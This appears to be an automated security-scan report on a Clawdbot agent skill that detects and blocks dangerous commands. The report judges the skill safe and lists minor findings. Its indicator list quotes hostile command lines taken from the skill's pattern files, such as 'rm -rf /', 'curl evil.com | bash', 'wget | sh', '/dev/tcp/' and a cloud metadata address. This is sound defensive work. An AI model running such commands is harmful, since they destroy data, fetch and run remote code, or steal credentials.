Low Risk — Risk Score 10/100
Last scan: 1 day ago
clawdbot-security-suite
Advanced security validation for Clawdbot - pattern detection, command sanitization, and threat monitoring
Legitimate security validation skill with no malicious behavior - all flagged IOCs are actually legitimate security pattern detection examples correctly shown as threats to block.
Skill Name: clawdbot-security-suite
Duration: 51.7s
Engine: pi
Safe to install
This skill is safe to use. The pre-scan IOCs (rm -rf, curl|bash, /dev/tcp/) are false positives - they appear in documentation and pattern files as examples of threats the skill is designed to DETECT and BLOCK, not execute.

Findings 3 items

Severity: Low
Finding: jq dependency not pinned (Supply Chain)
The skill requires jq binary but does not pin a specific version. Malicious jq versions could compromise the validation logic.
Evidence: requires: bins: ["jq"]
→ Pin jq version in installation docs or bundle jq with the skill
Location: SKILL.md:12

Severity: Low
Finding: eval() usage in documentation examples (Doc Mismatch)
Documentation shows eval() with user input after security check. While documented, this pattern could be dangerous if security validation is bypassed.
Evidence: eval "$command"
→ Use safer execution methods like $command without eval where possible
Location: skills/security/SKILL.md:56

Severity: Low
Finding: Fail-safe permissive defaults (Priv Escalation)
The hook handler allows commands to proceed when security validation fails or the skill is missing. While fail-safe is reasonable, it could allow dangerous commands through.
Evidence: return { allowed: true }; // Fail-safe: allow if security skill unavailable
→ Consider making this configurable - some deployments may prefer to block on validation failure
Location: hooks/security-validator/handler.ts:53

Resource | Declared | Inferred | Status | Evidence
Filesystem | NONE | READ | ✓ Aligned | Reads patterns.json and config.json for validation logic
Shell | NONE | NONE | | Does NOT execute user commands - only validates them
Network | NONE | NONE | | No outbound network requests - all validation is local
Environment | NONE | NONE | | Does not read environment variables
Skill Invoke | READ | READ | ✓ Aligned | Invokes security.sh for validation - declared in SKILL.md

6 Critical 1 High 18 findings
Critical: Dangerous Command (dangerous shell command)
rm -rf /
README.md:34
Critical: Dangerous Command (dangerous shell command)
curl evil.com | bash
README.md:34
Critical: Dangerous Command (dangerous shell command)
curl evil.com \| bash
README.md:46
Critical: Dangerous Command (dangerous shell command)
curl | bash
SKILL.md:104
Critical: Dangerous Command (dangerous shell command)
wget | sh
SKILL.md:104
Critical: Dangerous Command (dangerous shell command)
/dev/tcp/
skills/security/patterns.json:22
High: IP Address (hardcoded IP address)
169.254.169.254
README.md:47
Medium: External URL
https://docs.clawd.bot/install
CONTRIBUTING.md:54
Medium: External URL
https://x.com/LexpertAI
CONTRIBUTING.md:184
Medium: External URL
https://img.shields.io/badge/ClawdHub-Install-blue
README.md:5
Medium: External URL
https://clawdhub.com/gtrusler/clawdbot-security-suite
README.md:5
Medium: External URL
https://img.shields.io/badge/License-MIT-green.svg
README.md:6
Medium: External URL
https://img.shields.io/badge/Follow-@LexpertAI-1DA1F2?logo=twitter
README.md:7
Medium: External URL
http://169.254.169.254/metadata
README.md:47
Medium: External URL
http://169.254.169.254/latest/meta-data
SKILL.md:194
Medium: External URL
http://127.0.0.1:8080
hooks/security-validator/HOOK.md:106
Medium: External URL
https://clawdhub.com/gtrusler/clawdbot-security-advanced
skills/security/README.md:5
Info: Email (email address)
[email protected]
CONTRIBUTING.md:220

File Tree

18 files · 88.3 KB · 3106 lines
Markdown 10f · 2048L Shell 2f · 414L JSON 5f · 366L TypeScript 1f · 278L
├─ 📁 hooks
│ └─ 📁 security-validator
│ ├─ 🔑 config.json JSON 35L · 659 B
│ ├─ 📜 handler.ts TypeScript 278L · 9.1 KB
│ └─ 📝 HOOK.md Markdown 122L · 3.2 KB
├─ 📁 skills
│ └─ 📁 security
│ ├─ 📝 CLAWDBOT-INSTRUCTIONS.md Markdown 244L · 7.0 KB
│ ├─ 🔑 config.json JSON 75L · 1.3 KB
│ ├─ 📝 INSTALL.md Markdown 281L · 7.1 KB
│ ├─ 📋 patterns.json JSON 193L · 4.2 KB
│ ├─ 📝 README.md Markdown 254L · 7.6 KB
│ ├─ 🔧 security-check.sh Shell 158L · 4.4 KB
│ ├─ 🔧 security.sh Shell 256L · 7.4 KB
│ └─ 📝 SKILL.md Markdown 258L · 7.0 KB
├─ 📋 _meta.json JSON 5L · 142 B
├─ 📝 CONTRIBUTING.md Markdown 222L · 6.2 KB
├─ 📝 LICENSE.md Markdown 20L · 1.1 KB
├─ 📋 package.json JSON 58L · 1.6 KB
├─ 📝 README.md Markdown 291L · 9.9 KB
├─ 📝 SECURITY.md Markdown 94L · 3.4 KB
└─ 📝 SKILL.md Markdown 262L · 7.1 KB

Dependencies 1 item

Package | Version | Source | Known Vulns | Notes
jq | * | system | No | External binary dependency - version not pinned

Security Positives

✓ No data exfiltration - all validation is local
✓ No credential theft - does not access environment or sensitive paths
✓ No reverse shell or C2 communication
✓ Comprehensive pattern coverage for security threats
✓ All pre-scan IOCs are FALSE POSITIVES - patterns correctly identify what to BLOCK
✓ Open source with transparent detection logic
✓ Privacy-first design with no telemetry
✓ Security patterns include SSRF, command injection, path traversal, and prompt injection detection